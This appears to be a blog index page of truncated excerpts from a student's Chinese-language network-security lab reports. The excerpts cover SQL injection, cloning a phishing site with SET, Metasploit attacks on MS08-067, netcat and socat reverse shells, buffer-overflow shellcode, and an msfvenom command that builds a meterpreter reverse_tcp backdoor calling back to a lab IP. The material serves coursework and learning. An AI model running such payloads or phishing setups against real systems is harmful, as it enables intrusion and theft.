摘要:
20155234 昝昕明《基于ARM实验箱的国密算法应用》课程设计个人报告 个人贡献 参与课设题目讨论及完成全过程; 资料收集; SM1算法及和ARM之间通信 负责串口代码调试; 协调完成小组结题报告; 负责实验箱的管理; 设计中遇到的问题及解决方法 开发板无法ping通主机 在虚拟机VMware里 阅读全文
摘要:
20155234 Exp9 Web安全基础 基础问答 SQL注入攻击原理,如何防御? SQL注入攻击就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意SQL命令的目的。 对于SQL注入攻击的防范,我觉得主要还是应该从代码上入手: 采用预编译语句集Pr 阅读全文
摘要:
基础问答 什么是表单 可以收集用户的信息和反馈意见,是网站管理者与浏览者之间沟通的桥梁。 表单包括两个部分:一部分是HTML源代码用于描述表单(例如,域,标签和用户在页面上看见的按钮),另一部分是脚本或应用程序用于处理提交的信息(如CGI脚本)。不使用处理脚本就不能搜集表单数据。 表单通常是交由CG 阅读全文
摘要:
简单应用SET工具建立冒名网站 检查80端口是否被占用 netstat tupln |grep 80 已经被其他进程占用则kill命令结束进程 输入命令apachectl start开启Apache服务,接着打开一个新的终端窗口,输入setoolkit打开SET工具并配置攻击 攻击成功 etterc 阅读全文
摘要:
whois查询 whois用来进行域名注册信息查询。以常用的百度为例,输入whois baidu.com可查询到3R注册信息,包括注册人的姓名、组织和城市等信息。 我们可以很清楚地看到baidu的3R注册信息,包括注册人的组织和城市等信息。 值得注意的是进行whois查询时要去掉www等前缀否则可能 阅读全文
摘要:
攻击MS08 067安全漏洞 WindowsXP 在kali输入msfconsole进入控制台,依次输入指令 第一次很遗憾失败了 发现是防火墙没关重新来过成功 攻击MS11 050安全漏洞 IE7.0 进入控制台,配置 在windows中打开IE访问 不知道为什么失败了,查看了狄老师的博客,她试验了 阅读全文
摘要:
实验4 恶意代码分析 系统运行监控 Schtasks 先建立一个netstat20155234.txt文件,在文件中输入 date /t c:\netstat20155234.txt time /t c:\netstat20155234.txt netstat bn c:\netstat201552 阅读全文
摘要:
使用msf编码器生成jar包 使用指令:msfvenom p java/meterpreter/reverse_tcp lhost=192.168.157.141 lport=5234 x 5234_backjar.jar 上传扫描的结果: 结果还行 使用veil evasion生成反弹链接的可执行 阅读全文
摘要:
Windows获得Linux Shell 1.查看ip 2.监听端口 3.实验成功如下图 Linux获得Win Shell 1.查看虚拟机ip 2.监听端口 3.实验成功如下图 使用NC传输数据 1.用crontab e指令编辑一条定时任务 输入3,选vim.basic 2.成功 使用socat获取 阅读全文
摘要:
实践内容: 手工修改可执行文件,改变程序执行流程,直接跳转到getShell函数。 利用foo函数的Bof漏洞,构造一个攻击输入字符串,覆盖返回地址,触发getShell函数。 注入一个自己制作的shellcode并运行这段shellcode 实践所涉及指令 汇编中的指令: call:使程序跳转到某 阅读全文